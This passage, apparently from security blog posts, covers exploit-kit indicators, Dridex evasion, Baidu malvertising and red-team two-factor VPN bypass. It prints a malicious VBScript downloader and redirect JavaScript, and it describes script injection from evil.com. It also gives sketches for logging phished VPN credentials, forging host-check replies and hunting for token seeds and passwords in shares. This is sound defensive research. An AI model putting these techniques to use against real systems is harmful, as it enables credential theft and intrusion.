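MD5 is used here only because the published IOCs are MD5s; it is not suitable as a general integrity mechanism.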

ADDITIONAL INFO

Attacks involving the GongDa Exploit Kit are not new and are fairly common in the APAC region. While it’s not the most cutting edge EK in the wild, it is still effective because many systems in the region seem to remain unpatched and defenseless against antiquated vulnerabilities such as those used by GongDa.

Additionally, GongDa consistently leverages infrastructure hosted on one of China’s largest ISPs, China Telecom, operator of AS4134. China Telecom hosts the domain 51yes[.]com, a web traffic statistics service.

One of GongDa’s telltale behaviors is the use of stat counters, presumably for tracking the EK’s traffic and infection statistics. In this case they almost always come from countX[.]51yes[.]com, based out of China. Figure 9 shows the GET requests for these stat counters.


Figure 9: Stat counter request

FireEye’s Dynamic Threat Intelligence shows that count7[.]51yes[.]com has been used in multiple GongDa EK attacks in January 2016 alone.

Referring GongDa URLs

  • bose.co.kr/shop/img/click/ad1.html
  • bose.co.kr/shop/img/click/as1.html
  • bose.co.kr/shop/img/naver/ad.html
  • edresearch.co.kr/PEG/click/ad.html
  • edresearch.co.kr/PEG/click1/ad.html
  • nstory.com/tmp/click/ad1.html
  • nstory.com/vars/ad/ad1.html
  • nstory.com/vars/cache/click/ad1.html
  • odbike.co.kr/w3c/cdn/ad1.html
  • odbike.co.kr/shop/skin/click/ad1.html
  • odbike.co.kr/shop/temp/click/ad1.html
  • poption.kr/gnu/cdn1/ad.html
  • poption.kr/gnu/click/ad.html
  • poption.kr/gnu/extend/ad/ad.html
  • poption.kr/w3c/click/ad.html
  • sekielec.co.kr/m/et/ad.html
  • smsmaster.co.kr/docs/click1/ad.html
  • smsmaster.co.kr/docs/click3/ad.html
  • www.poption.kr/gnu/js/click/ad.html

Checking other countX[.]51yes[.]com hits with GongDa referrers, we saw hundreds of domains affected by GongDa EK activity.
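That pivot – keying on the stat-counter hosts and collecting the referrers seen alongside them – is easy to reproduce against proxy logs. The sketch below assumes a simplified "host referrer" log line format for illustration; real log parsing would depend on your proxy's schema.

```python
import re

# Hypothetical hunting sketch: given proxy log lines of the form
# "<host> <referrer>", collect referrers seen on 51yes stat-counter
# requests. The log format here is an assumption for illustration.
COUNTER_RE = re.compile(r"^count\d+\.51yes\.com$")

def gongda_referrers(log_lines):
    hits = set()
    for line in log_lines:
        host, _, referrer = line.partition(" ")
        if COUNTER_RE.match(host):
            hits.add(referrer)
    return sorted(hits)

logs = [
    "count7.51yes.com sekielec.co.kr/m/et/ad.html",
    "cdn.example.net sekielec.co.kr/m/et/ad.html",
    "count7.51yes.com bose.co.kr/shop/img/click/ad1.html",
]
print(gongda_referrers(logs))
```

Note that 51yes[.]com is a legitimate statistics service, so the counter host alone is not an IOC; it is the combination with an EK-style landing-page referrer that makes the pivot useful.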

It is believed that the GongDa Exploit Kit has Chinese origins. The hypothesis is derived from capabilities, usage, and the infrastructure used to target various APAC region entities.

Interestingly, the registrant for the sekielec.co[.]kr GongDa landing page domain, “rhhan AT sekihe.co[.]kr”, also registered a number of other domains that have been observed as being GongDa landing pages as well.

CONCLUSION

With a name reminiscent of a creature straight out of Monster Island, GongDa may not be the new kid on the block; however, as demonstrated, it is still active and capable of wreaking havoc. Network defenders in the APAC region should be aware of this EK and take steps to ensure this “monster” never enters their network.

ACKNOWLEDGEMENTS

The authors and FireEye Labs would like to thank Dan Perez for his contribution to this blog.

Stop Scanning My Macro

FireEye Labs detected an interesting evasion strategy in two recent, large Dridex campaigns. These campaigns changed the attachment file-type and location of malicious logic in an attempt to avoid scanners.

Overview

Both campaigns used an invoice theme and came from a wide variety of sending addresses, with messages being sent to more than 40 countries across all industries, as seen in Figure 1 and Figure 2. The following subject lines were used:

Invoice <xxxx> from Tip Top Delivery
Urgent: IMAGINiT invoice <xxxx> is Past due

Figure 1. Affected Countries

Figure 2. Affected Industries

What made these two campaigns interesting was the major shift in the downloader techniques used to evade signature-based detection. The following are some of the key techniques that were used:

  1. Disguising WordprocessingML as RTF file to evade type specific signatures.
  2. Keeping the main malicious macro clean to avoid macro-based detection. The malicious VBA code was instead stored in TextBox objects located within the Forms, as seen in Figure 4.
  3. Dropping a VBE based downloader that could not be seen without execution of the malicious RTF file. This downloader would then download and execute the malicious payload.

1.    Masquerading WordprocessingML as RTF file

While Dridex has traditionally been delivered using Excel, Word, or JavaScript files, these two large campaigns involved WordprocessingML (an XML format that is supported by Microsoft Word to describe a Word document) masquerading as RTF files. This seems to be a trend, as we saw a similar technique in previous campaigns where a DOCM file was disguised as RTF. Figure 3 shows a screenshot of the Tip Top campaign, set as high priority.
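The masquerade is detectable because the two formats have unmistakably different leading bytes: a true RTF file begins with "{\rtf", while WordprocessingML is XML. A minimal sketch of that mismatch check (function name and thresholds are our own, not from any particular product):

```python
# Sketch of the masquerading check described above: a true RTF file
# starts with "{\rtf", while WordprocessingML is XML. A .rtf attachment
# whose content starts like XML deserves suspicion.
def rtf_extension_mismatch(filename: str, head: bytes) -> bool:
    """True if a .rtf-named file actually begins like an XML document."""
    if not filename.lower().endswith(".rtf"):
        return False
    stripped = head.lstrip()
    return (not stripped.startswith(b"{\\rtf")
            and stripped.startswith(b"<?xml"))

print(rtf_extension_mismatch("invoice.rtf",
                             b'<?xml version="1.0"?><w:wordDocument>'))
print(rtf_extension_mismatch("invoice.rtf", b"{\\rtf1\\ansi"))
```

This is exactly the class of type-specific signature the campaign was trying to sidestep: scanners that trusted the extension never applied their WordprocessingML or macro checks.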

Figure 3. Designed Campaign

2.    Keeping the main macro clean

In the extracted macro, it is interesting to note that there is almost no malicious content that could trigger static detection. In fact, a majority of the key ingredients are stored in text boxes within created forms, shown in Figure 4.

This technique defeats signature-based scanning, which tries to detect known malicious macros based on past knowledge. At the time of discovery, most of the samples observed were detected by only one of 56 vendors on VirusTotal, indicating that the modifications made to these malicious documents were likely an effort to avoid detection.

Figure 4. Secret Macro

3.    VBE Downloader

Once the malicious macro is launched, the Word document drops a malicious VB Encoded script in a temporary folder, as shown in Figure 5.

Figure 5. Location of the VBE

Based on our analysis, the VBE simply downloads Dridex from the malware server and installs it on infected machines, as shown in Figure 6.

Figure 6. Decoded VBE

Signatures

The authors left Cyrillic strings in the XML, which could possibly be used as an IOC to hunt for similar documents.

  • <wx:uiName wx:val="Основной шрифт абзаца"/> (translates to "The main text of the paragraph")
  • <wx:uiName wx:val="Обычная таблица"/> (translates to "table Normal")
  • <wx:uiName wx:val="Нет списка"/> (translates to "No List")
  • <o:LastAuthor>павуваыва</o:LastAuthor>
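The Cyrillic strings above can be turned into a simple document hunt. A minimal sketch; matching on decoded text rather than raw bytes sidesteps encoding differences between samples:

```python
# Minimal hunting sketch: search a document's XML for the Cyrillic
# strings listed above. Matching decoded text avoids encoding issues.
CYRILLIC_IOCS = [
    "Основной шрифт абзаца",
    "Обычная таблица",
    "Нет списка",
    "павуваыва",
]

def matches_iocs(xml_text: str):
    """Return the subset of IOC strings present in the document text."""
    return [s for s in CYRILLIC_IOCS if s in xml_text]

doc = ('<wx:uiName wx:val="Нет списка"/>'
       '<o:LastAuthor>павуваыва</o:LastAuthor>')
print(matches_iocs(doc))
```

The first three strings are default Word style names on a Russian-language install, so they indicate authoring environment rather than malice on their own; the LastAuthor value is the more specific of the four.
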

Conclusion

Cybercriminals continue to innovate, this time demonstrating a creative way of making threats harder to detect using static signatures. To remain secure, it is important to stay vigilant and proactive in three key areas: user awareness, policy and technology.

Indicators of Compromise

1.     IMAGINiT campaign

MD5
8840c20ac74281c0580e8637caf1edea
800f90f29d13716eb1f7059fb84089ed
7e74d5a3a20038fe0a66445eb76fa066
7a4b7762f8db2438b4ad3d991864431d
74f9da1ce1ff900113ae7cb28b3eb56f
6ccc678c3ec284fad015ed0eaa875733
3ea5c225132f0d7423417b3c7ce98c7d
33b2a2d98aca34b66de9a11b7ec2d951

Network Indicator
GET /michigan/map.php HTTP/1.1
house.nochildforgotten.org
IGINV51905.rtf

2.     Tip Top Delivery campaign

MD5
858451ad73050bda48e5470abd2643ac
aff54d68cbf6ac8611fe89cd9f0dc2de
876d081e8b474a3c1ac57cf435e330cb
d8eebe2a08fff86abd06ec94e8bdd165
8c07b9337deda3c589d50e4ff3aadcd6
73c7bf49caa0d1bd37053b99a986ebe8
770fede93cc4220a371569daed2a4bc1
5b7813105cf9ebccb46cf7e63a5a836d
8f787ddedbaa8af3f6a73d0c6cd4e33e

Network Indicator
GET /michigan/map.php HTTP/1.1
parts.woodwardcounselinginc.com
Invoice_GIINV02514_from_tip_top_delivery.rtf

Wiping Out a Malicious Campaign Abusing Chinese Ad Platform

At FireEye Labs, we have discovered another well-crafted malvertising campaign that uses the ad API of one of the world’s largest search engines: China-based Baidu. The attacker employs a simple HTML redirector instead of shellcode or an exploit in an apparently benign-looking website. This leads to a redirection loop that fetches malicious content from compromised ad slots, which in turn drops a chain of malware on the infected machine. This malvertising campaign involving Baidu’s API has been designed so that its actual source is hard to trace back.

The campaign was first seen in the middle of October 2015, and instances of the threat were still active as of February. Baidu took several steps to address the issue following FireEye’s responsible disclosure, but at the time, Internet surfers who navigated to an infected page for this campaign – such as hxxp://www.duds[.]win – would be redirected to the following URL:

hxxp://www.ymnemh[.]info/index.htm

The obtained response has two parts.

Setting up a redirection loop:

In the first part of the response, the code creates a number of tracking cookies using JavaScript, which keep track of the current time and the number of visits to the page. The script is given in Code Listing 1 for reference:

<script>
function getCookieVal(offset) {
    var endstr = document.cookie.indexOf(";", offset);
    if (endstr == -1)
        endstr = document.cookie.length;
    return unescape(document.cookie.substring(offset, endstr));
}
function GetCookie(name) {
    var arg = name + "=";
    var alen = arg.length;
    var clen = document.cookie.length;
    var i = 0;
    while (i < clen) {
        var j = i + alen;
        if (document.cookie.substring(i, j) == arg)
            return getCookieVal(j);
        i = document.cookie.indexOf(" ", i) + 1;
        if (i == 0)
            break;
    }
    return null;
}
function SetCookie(name, value) {
    var argv = SetCookie.arguments;
    var argc = SetCookie.arguments.length;
    var expires = (2 < argc) ? argv[2] : null;
    var path = (3 < argc) ? argv[3] : null;
    var domain = (4 < argc) ? argv[4] : null;
    var secure = (5 < argc) ? argv[5] : false;
    document.cookie = name + "=" + escape(value) +

        ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
        ((path == null) ? "" : ("; path=" + path)) +
        ((domain == null) ? "" : ("; domain=" + domain)) +
        ((secure == true) ? "; secure" : "");
}
function DisplayInfo() {
    var expdate = new Date();
    var visit;
    // Set expiration date to a year from now.
    expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000 * 365));
    if (!(visit = GetCookie("visit")))
        visit = 0;
    visit++;
    SetCookie("visit", visit, expdate, "/", null, false);
    var url = "";
    if (visit == 2) url = "hxxp://www.ymnemh[.]info/index2.htm";
    if (visit == 3) url = "hxxp://www.txiu[.]cc/index3.htm";
    if (visit >= 4) { url = "hxxp://www.ymnemh[.]info/index.htm";
                     ResetCounts(); }
    if(url != "") window.location = url;
}
function ResetCounts() {
    var expdate = new Date();
    expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000 * 365));
    visit = 0;
    SetCookie("visit", visit, expdate, "/", null, false);

}
DisplayInfo();
</script>

The highlighted part of Code Listing 1 is of main interest here. Every time the user lands on this web page, the browser is redirected to a certain set of infected pages for the same attack family until the user loops back to the same page – and it continues forever.
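The visit-counter logic from Code Listing 1 can be restated compactly to make the cycle visible. This is a Python re-statement of DisplayInfo() and ResetCounts(), not attacker code: every fourth visit resets the counter and loops back to index.htm.

```python
# Python re-statement of the visit-counter redirect in Code Listing 1:
# visit 1 stays, visits 2-3 redirect onward, visit 4+ loops back to
# index.htm and resets the counter (ResetCounts).
def next_url(visit):
    """Mirror of the DisplayInfo() redirect table."""
    if visit == 2:
        return "hxxp://www.ymnemh[.]info/index2.htm"
    if visit == 3:
        return "hxxp://www.txiu[.]cc/index3.htm"
    if visit >= 4:
        return "hxxp://www.ymnemh[.]info/index.htm"
    return ""  # first visit: no redirect yet

visit, seen = 0, []
for _ in range(8):
    visit += 1                      # cookie increments on each page load
    seen.append(next_url(visit) or "(stay)")
    if visit >= 4:
        visit = 0                   # ResetCounts()
for step in seen:
    print(step)
```

Running this shows the four-step cycle repeating indefinitely, which is exactly the "continues forever" behavior described above.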

Deploying the attack iframe:

In the second part of the response, the first attack iframe is deployed, as seen in Figure 1:

Figure 1. The first attack iframe (Remember the highlighted part)

When the GET request for this iframe is generated, it feeds a compromised ad slot id to the standard ad API of Baidu using the API standard script o.js, as seen in Figure 2.

Figure 2. The second attack iframe is being fetched from a compromised ad slot

The script hxxp://cbjs.baidu[.]com/js/o.js generates the following request (Figure 3). The response is the second attack iframe (Figure 4):

Figure 3. Notice the compromised ad slot 1xxxx78 that is being utilized to fetch second iframe

Figure 4. The second attack iframe has been fetched from compromised ad slot 1xxxx78

The second attack iframe hxxp://p.jiayuepc[.]com/c.html?u=c6 has now been fetched in the above response from the compromised ad slot 1xxxx78. This URL then uses the last compromised ad slot in this attack, 1xxxx80, to fetch the actual attack script. The response to this URL can be seen in Figure 5.

Figure 5. The second attack iframe hxxp://p.jiayuepc[.]com/c.html?u=c6 has requested attack body from the compromised ad slot 1xxxx80

Here comes the malicious code:

Figure 6 shows the final request made to the ad server by the ad API script o.js using the compromised ad slot id.

Figure 6. Second attack iframe generates Baidu's ad API request fetching malicious VBScript from compromised ad slot

Notice the underlined part of this URL, automatically generated by o.js, in Figure 6. The ltu, ltr and lcr variables are assigned the first attack iframe URL string, whereas liu is given the second attack iframe URL string. These will be utilized to dynamically alter the contents of the actual attack response – in this case, the name of the executable being dropped.

The server responds with the encrypted attack masked inside the API’s response body. What is actually hiding inside is a VBScript that is dropped in C:\Windows\Temp with the name logo.vbs. It downloads and launches a malicious executable from a dedicated file server. The contents of this script are interesting, as shown highlighted in Code Listing 2.

Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","hxxp://co.lxxxxx98[.]com/logo.bmp?1450263107531",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile "C:\Windows\Temp\logo_c6-66pb_pic10.exe",2

Code Listing 2

Here, c6-66pb_pic10 is the name of the dropped executable that is derived from the iframe URLs that eventually lead to the attack slot, so this dynamically generated name is different for different redirection pathways, as shown in Figure 7.

Figure 7. Attack has been dynamically altered based on first and second iframe information which was sent to slot 1xxxx80

A pseudorandom numeric token (in this case 1450263107531, as highlighted in Code Listing 2) is sent to the attack hosting server co.lxxxxx98[.]com along with the logo.bmp request (as highlighted in code line #2 in Code Listing 2). The response is a polymorphic Trojan downloader executable that always has the same name, i.e. logo.bmp.
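The token's magnitude suggests it is a JavaScript Date.getTime() value, i.e. milliseconds since the Unix epoch, appended as a cache-buster. That interpretation is our assumption, but decoding it under that assumption lands squarely inside the campaign window:

```python
from datetime import datetime, timezone

# Assumption: the token is a millisecond epoch timestamp (JavaScript
# Date.getTime()). Decoding it dates the request to December 2015,
# inside the campaign window described above.
token = 1450263107531
when = datetime.fromtimestamp(token / 1000, tz=timezone.utc)
print(when.isoformat())
```

A per-request timestamp like this also defeats naive response caching, ensuring each victim fetches a fresh copy of the polymorphic logo.bmp payload.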

In this case, the executable is from a Trojan downloader family recognized by Microsoft as Win32/Jongiti. As per the Microsoft.com website:

“This threat downloads and installs other programs onto your PC without your consent, including other malware.”

The infection continues:

The attack doesn’t stop there. Another GET request to the same server hosting logo.bmp is generated, requesting a file named c.ini, as seen in Figure 8.

Figure 8. c.ini requested from the same server lxxxxx98[.]com that served the first binary as logo.bmp

A list is returned in the response containing potentially unwanted programs (PUPs) and Trojan downloaders available for direct download, as shown in Figure 9.

Figure 9. c.ini lists downloadable executables returned in response to hxxp://pz.lxxxxx98[.]com/c.ini?1450263172

The list from c.ini is then fed to logo_c6-66pb_pic10.exe as an argument, and the unwanted content – mostly PUPs, keyloggers and pornographic content droppers – is launched one by one on the victim machine. Figure 10 shows this process.

Figure 10. logo_c6-66pb_pic10.exe downloads rag1446260.exe, which can download further unwanted content

On systems running Windows, the latest versions of Internet Explorer (IE) will prompt against this malvertisement since, as of IE11, Microsoft stopped supporting execution of VBScript on the client side. Users who are currently running versions of IE that are older than 11.0 can stay safe from these types of attacks by simply upgrading their browsers to IE11 or later.

FireEye representatives contacted Baidu officials to responsibly disclose the issue. Baidu fully cooperated by taking immediate action against the attacking party and removing all malicious content. They also made immediate changes to their ad platform regulations so that certain dynamic behaviors such as loading VBScript or downloading executables from suspicious domains are no longer allowed.

A shift to backup ad slots:

Though crippled due to its main ad slot content being removed, this malvertising campaign shifted to its backup ad slots. FireEye immediately communicated the details to Baidu and the issue was quickly addressed. At the time of posting, the campaign is no longer active. During the two-week wait period before FireEye made this post public, Baidu conducted a massive search and clean operation on its ad slots. As per Baidu officials:

  • From March 14 to March 18, evidence gathering from the attacker account was finalized and all their malicious content was cleaned.
  • It is now mandatory for all existing and new accounts to bind and verify a cellphone number and domain name registration record (both have real-name enforcement in China) for verification. Account identities related to malicious content can be provided to the law enforcement agencies.
  • Baidu has enhanced its detection mechanism to capture malicious content hosted on its ad platform. All existing uploaded content is also to be fully scanned.

From March 21 to March 31, Baidu is in the process of shutting down the upload channel for user-defined scripts and Flash on its ad platform. This means that similar malvertising campaigns can no longer host content on Baidu’s ad slots in the future.

99 Problems but Two-Factor Ain’t One

Two-factor authentication is a best practice for securing remote access, but it is also a Holy Grail for a motivated red team. Hiding under the guise of a legitimate user authenticated through multiple credentials is one of the best ways to remain undetected in an environment. Many companies regard their two-factor solutions as infallible and do not take precautions to protect against attackers’ attempts to bypass or backdoor them.

The techniques covered in this blog range from simple to advanced methods of handling two-factor authentication from the perspective of a red team, and provide insight into potential visibility gaps for security teams to address. I’ll discuss techniques for bypassing two-factor authentication remotely without access to the internal environment, and how to gain access to a two-factor authenticated remote access device with information stolen from the internal environment.

1) K.I.S.S - Keep It Simple, Stupid

Compromising a remote access solution is a red team’s foremost goal because it offers easy access and a low risk of being caught. Red teams using legitimate remote access solutions can conduct their command, control, exploitation, and exfiltration activities under the guise of properly authenticated sessions. In addition, the red team’s system is not subject to the same security restrictions or controls as other corporate systems. This means that the team does not have to deal with antivirus, application whitelisting, and other intrusion detection software interfering with their activities. Two-factor authentication obviously raises the difficulty to compromise these remote access solutions, and challenges red teams to subvert the two-factor protections in place.

In difficult situations like these, it’s best to adopt an Occam’s razor approach and use the most straightforward method to acquire the credentials we need: ask the victim to enter them for us. The perfect trap happens to be the simplest to set.

In Figure 1, we have two different VPN login pages. One is a corporation’s legitimate site, the other is a fake operated by a crafty red team. Can you spot the difference?

Figure 1: VPN authentication page comparison

No? Neither can your users. Using tools such as the Social-Engineer Toolkit (SET), anyone can effectively replicate an external page by changing the HTML’s local resource locations (“/home/image/logo.png”) to external references (“mycompany.com/home/image/logo.png”). With a compelling phishing scenario, you can guide the victim to your visual clone VPN authentication page and get all the information you need to make your own connection: username, password, and even the token code!

If the red team can move quickly enough, they can take credentials submitted to the fake VPN page and use them to authenticate to the actual VPN. As shown in Figure 2, this can be accomplished by redirecting the login submission to a PHP script that will write the username, password and other metadata (IP address, HTTP User-Agent, time of submission) to a log file that the red team can monitor and wait for a user to provide their two-factor credentials.

Figure 2: Credential theft PHP POST script
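The harvester in Figure 2 is written in PHP; the same logging logic can be sketched in Python. This is a rough illustration, not the actual script: the form field names (`username`, `password`, `tokencode`) are hypothetical and must match whatever the cloned login page actually submits.

```python
import datetime

def log_submission(form, client_ip, user_agent, logfile="creds.log"):
    """Append one pipe-delimited line per captured login attempt.

    `form` is the parsed POST body; the field names used here are
    hypothetical stand-ins for whatever the cloned form submits.
    """
    line = "|".join([
        datetime.datetime.now(datetime.timezone.utc).isoformat(),  # time of submission
        client_ip,                                                 # source IP address
        user_agent,                                                # HTTP User-Agent
        form.get("username", ""),
        form.get("password", ""),
        form.get("tokencode", ""),                                 # one-time token code
    ])
    with open(logfile, "a") as fh:
        fh.write(line + "\n")
    return line
```

Because token codes expire within a short window, the red team monitors this log in real time and replays fresh submissions against the legitimate VPN immediately.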

Once the red team authenticates to the VPN, they can attempt to escalate privileges and access sensitive data before the security team can detect and respond to the phish. Internal network reconnaissance through scanning, identifying applications and systems that the victim user can access, and even LLMNR/NBT-NS spoofing offer potential avenues to turn a VPN session into full compromise of the environment.

The Mandiant Red Team leverages SpiderLabs’ Responder as our LLMNR/NBT-NS spoofing tool of choice. Responder is a powerful Python utility that sends fake responses to LLMNR/NBT-NS requests to fool systems and services into providing password hashes and, in some cases, plaintext credentials. Running Responder on a VPN subnet for even a few minutes (as exemplified in Figure 3) can provide numerous domain accounts and password hashes. Common passwords and passwords with low complexity requirements can have their hashes cracked in seconds, giving the red team the plaintext credentials they need to continue their lateral movement and privilege escalation.


Figure 3: Responder example

How to prevent this attack
  1. Ensure that your VPN solution enforces a single authenticated session per user. There is limited justification for allowing multiple, concurrent sessions (with different source IP addresses) for a single user account.
  2. Conduct regular auditing of VPN authentication logs to identify anomalous login activity, such as flagging login events originating from TOR exit nodes.
  3. When responding to phishing incidents, take the potential loss of credentials seriously. If there is reason to suspect credentials were lost, make sure to reset all affected credentials and review access logs for evidence of malicious activity.
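The second recommendation above is easy to automate. A minimal sketch, assuming you maintain your own copy of a Tor exit-node feed (for example, the Tor Project's published exit-address list) and can export login events as (user, source IP) pairs:

```python
def flag_tor_logins(login_events, tor_exit_ips):
    """Return login events whose source IP appears in a Tor exit-node list.

    `login_events` is an iterable of (username, source_ip) pairs; the
    exit-node list is assumed to be refreshed separately from a public feed.
    """
    exits = set(tor_exit_ips)
    return [(user, ip) for user, ip in login_events if ip in exits]
```

The same pattern extends to other anomaly checks, such as flagging a single account with concurrent sessions from different source addresses.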

2) XSS in Sheep’s Clothing

VPN login pages are valuable targets because their image evokes a sense of familiarity and security with the users. If you authenticate to the VPN every day using a web page such as the one shown in Figure 1, odds are that you’re not inspecting your traffic or the website code to verify your credentials are going where you think they are. The scary truth is that real-world attackers have already started capitalizing on this implicit trust and have been discovered leveraging JavaScript-based credential harvesters on corporate VPN login pages.

Let’s discuss how this attack works. First, the red team exploits a vulnerability to write code to the authentication page (or a page that gets loaded by the authentication page), such as the vulnerability discussed in CVE-2014-3393. The red team then adds code to the authentication page to execute malicious JavaScript from a system they control and waits for unsuspecting users to load the page and authenticate. An example of such code is shown in Figure 4.

Figure 4: Malicious code snippet

The victim user does not notice anything different. This tiny bit of code loads the file “stealcreds.js” from “https://www.evil.com” and injects its code into the legitimate user’s web session (i.e., the JavaScript runs in the context of the user’s browser). By using an external resource, we minimize the code introduced on the login page itself and retain the ability to dynamically update our payload each time a user’s browser requests the resource. Figure 5 shows a snippet of code we use to compromise user credentials.

Figure 5: Code snippet for stealing VPN creds

Using an internal frame insertion and a POST-back setup to “https://www.evil.com/pwnd.php”, the red team rigs the normal VPN login page to POST user credentials every time they are entered in a session where the “stealcreds.js” resource is loaded. By attacking the VPN solution itself, the red team can disguise themselves as legitimate users remotely connecting to the environment through the authorized remote access solution.

How to prevent this attack

Monitor access to your two-factor solutions and conduct regular examinations of any code served to users to ensure that no tampering has occurred. Two ways to accomplish this are to use a file integrity monitoring solution to monitor files served by networking devices and by conducting periodic scans or assessments of public infrastructure to identify changes.
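A file integrity check of this kind is straightforward to sketch. This is an illustrative example, not a product recommendation: record a hash baseline for every page the device serves, then periodically re-fetch and compare.

```python
import hashlib

def baseline(pages):
    """Record a SHA-256 baseline for served pages (path -> content bytes)."""
    return {path: hashlib.sha256(content).hexdigest()
            for path, content in pages.items()}

def detect_tampering(pages, known_good):
    """Return paths whose current content no longer matches the baseline."""
    current = baseline(pages)
    return sorted(path for path, digest in current.items()
                  if known_good.get(path) != digest)
```

Even a one-character change, such as an injected script tag referencing an external resource, produces a different digest and surfaces in the comparison.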

3) 1.5-Factor Authentication

Another popular VPN configuration is a “host check” process as a requirement to connect to the corporate VPN. Typically, this process verifies the host’s domain and some basic configuration stats, such as whether or not antivirus signatures have been updated. Some companies view this “host check” process as a pseudo-second factor (hence the 1.5-factor title). The unfortunate issue with host inspections is that they rely on the host being trustworthy.

We performed a red team assessment on a client that used a VPN device that required only a single-factor password authentication in addition to the “host check” process. Every piece of information examined by the “host check” process was provided in a web request and minimally obfuscated with Base64 encoding – fair game to anyone using a proxy. An example of the kind of data expected, complete with registry paths checked and the “correct answers,” is shown in Figure 6.

Figure 6: "host checker” policy from VPN authentication server

Not only does the “host check” process rely on trustworthy answers from potentially untrustworthy sources, it even provides what it’s inspecting within the request! At a minimum, a red team can attempt to modify the features examined during the check. Even worse, the response to the “host check” was a simple POST containing whether each inspected element was “correct” or not – another easy target for red teams using web proxies such as Fiddler or Burp.

We used a combination of Fiddler and Python to modify POST requests to generate a valid policy inspection report and fool the “host check” into approving us, as shown in Figure 7.

Figure 7: Python-generated policy report
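To make the weakness concrete, here is a hedged sketch of the forgery step. The wire format used below (Base64-wrapped, semicolon-separated `check=expected` pairs) is hypothetical; real appliances differ, but the flaw is the same: the server discloses exactly which answers it wants.

```python
import base64

def forge_host_check(policy_b64):
    """Decode a Base64 host-check policy and answer every check as compliant.

    Because the request itself lists each inspected item alongside its
    "correct answer," an attacker in-line with the traffic (e.g. via Fiddler
    or Burp) can simply echo the expected values back.
    """
    policy = base64.b64decode(policy_b64).decode()
    answers = []
    for item in policy.split(";"):
        if "=" in item:
            check, expected = item.split("=", 1)
            answers.append(check + "=" + expected)  # echo the expected value
    return base64.b64encode(";".join(answers).encode()).decode()
```

In our engagement the equivalent logic ran as a Fiddler script rewriting the POST in flight, producing the report shown in Figure 7.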

Another common form of 1.5-factor authentication is leveraging usernames and passwords in combination with a computer certificate. Some companies choose to authenticate both the user and their device before allowing remote access. While this is a good approach, requiring single-factor credential authentication in combination with a locally installed certificate is not. It is trivial for an attacker to gain access to an end user system, export the locally installed computer certificate, and install the certificate on their own virtual system.

How to prevent this attack

Do not use single-factor or 1.5-factor authentication for any remote access. Only strong multi-factor authentication (combining something you know, something you have, and something you are) should be implemented. If you want to leverage a computer certificate in conjunction with credential-based authentication, make sure you pair the client-side certificate with multi-factor credential-based authentication.

4) Email is the Enemy

Digital tokens often require a synchronization code that is unique to each user’s token in order to function properly. The synchronization code and algorithm are what ensure the token displayed to the user matches the token the authentication server expects. Many companies use a simple, IT-friendly process of emailing users a notice when their request for VPN access is approved. These emails often contain the “seed” key and installation instructions. Unfortunately for the security team, users often read this email and forget to delete it, leaving the literal keys sitting in the user’s inbox, ripe for an attacker to steal.

One of the steps in the Mandiant Red Team methodology is to search email inboxes (including .PST and .OST files on disk) for these types of sensitive and useful files. In most cases, we use a simple PowerShell script to search the user’s mailbox and related files for evidence of RSA soft-token .sdtid files.
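Our actual tooling is PowerShell, but the hunt is simple enough to sketch in Python. This is an illustrative equivalent, not the script we use:

```python
import os

def find_token_artifacts(root):
    """Walk `root` and return paths of RSA soft-token .sdtid files, plus
    mailbox stores (.pst/.ost) worth searching for token-delivery emails."""
    interesting = (".sdtid", ".pst", ".ost")
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(interesting):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)
```

In practice this runs against user profile directories, mapped drives, and any file shares the compromised account can read.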

The .sdtid file is essentially a password-protected certificate of authenticity you can use to set up a digital (“soft”) token on your local host. With the combination of both the .sdtid file and password (often located in the same email sent by your IT Help Desk, stored in a local text file, or stored in a local password manager), the red team can replicate a user’s soft-token and use a simple keylogger to identify the user’s PIN. After that, the red team gains two-factor authenticated access to the network at any time, day or night, masquerading as a legitimate user.

How to prevent this attack

Innocuous things such as a soft certificate in an email can help an attacker gain access to a company. “Soft” tokens are often easier targets for compromise than physical devices, so keep that in mind when deciding what you secure with two-factor authentication and how. Train your users to securely delete sensitive information once they’re done with it. Train your IT staff not to include passwords in the same email as the .sdtid file, or better yet, not to send the .sdtid file via email at all. For instance, require your users to authenticate to a website to download the .sdtid file.

5) Leaving the Vault Key under the Doormat

“Password vault” is a phrase that will inspire groans from even the most hardened red team veterans. A properly configured password vault is a powerful tool to restrict and monitor the usage of credentials in an environment. It reduces exposure of passwords to traditional tools such as Mimikatz and Windows Credentials Editor (WCE). After all, dumping passwords becomes a tired game when all administrative credentials change every time they are checked in and out of the vault.

Add a multi-factor-enabled RADIUS authentication server with physical tokens in front of that password vault and you’ve created a real challenge for a red team. In order for a red team to get a temporarily valid password, they now need to reproduce a user password, PIN and physical token code – all at once! Even with local access via a backdoor and a keylogger, the red team likely still won’t be able to enter that token code in time before the RADIUS server shuts down access because the token has already been used.

However, rather than give up at bypassing the highest level of password security that can be realistically implemented, a red team can return to the fundamental rule of security: your security chain is only as strong as its weakest link, and that weakest link is almost always the people involved in the processes. This is where we start to explore the unsecured Windows file share.

Unsecured Windows file shares have served our Red Team well over the years. We almost always get at least some of the data necessary for privilege escalation and sensitive data theft by combing through unsecured file shares. Unfortunately for security teams, Windows makes it incredibly easy to share files and folders in a domain and for a user or red team to discover those shares and scrape through them for valuable information. PowerView’s “Invoke-ShareFinder” PowerShell script is a great utility that offers a fair amount of scalability in the hunt for shares of interest. This tool can help you discover valuable information, including interesting shares such as one we recently found named “Security”. As expected, this share was readable to any user with valid domain credentials.
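Triage after share discovery can be scripted as well. A minimal sketch (the keyword patterns here are illustrative, not an exhaustive list) that scrapes readable files under a mounted share for password-like markers:

```python
import os
import re

# Illustrative markers only; real triage lists are much longer.
PATTERN = re.compile(r"(password|passwd|pwd|credentials)\s*[:=]", re.IGNORECASE)

def scrape_share(root):
    """Scan readable files under a mounted share and flag lines that look
    like stored credentials, returning (path, line number, line) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if PATTERN.search(line):
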